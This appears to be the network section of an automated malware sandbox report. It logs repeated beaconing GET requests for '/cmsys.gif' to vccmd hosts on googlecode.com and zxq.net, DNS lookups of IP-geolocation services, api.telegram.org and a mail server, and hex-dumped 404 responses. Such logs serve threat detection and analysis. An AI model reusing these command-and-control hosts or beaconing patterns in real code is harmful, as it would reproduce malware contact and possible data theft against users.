Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: vccmd01.googlecode.com
Source: global traffic	DNS traffic detected: DNS query: vccmd02.googlecode.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: vccmd03.googlecode.com
Source: global traffic	DNS traffic detected: DNS query: vccmd01.t35.com
Source: global traffic	DNS traffic detected: DNS query: vccmd01.zxq.net
Source: global traffic	DNS traffic detected: DNS query: zxq.net
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mail.javedan-battery.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 05 Mar 2025 08:58:31 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 05 Mar 2025 08:58:37 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:58:15 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:58:18 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:58:20 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:58:29 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 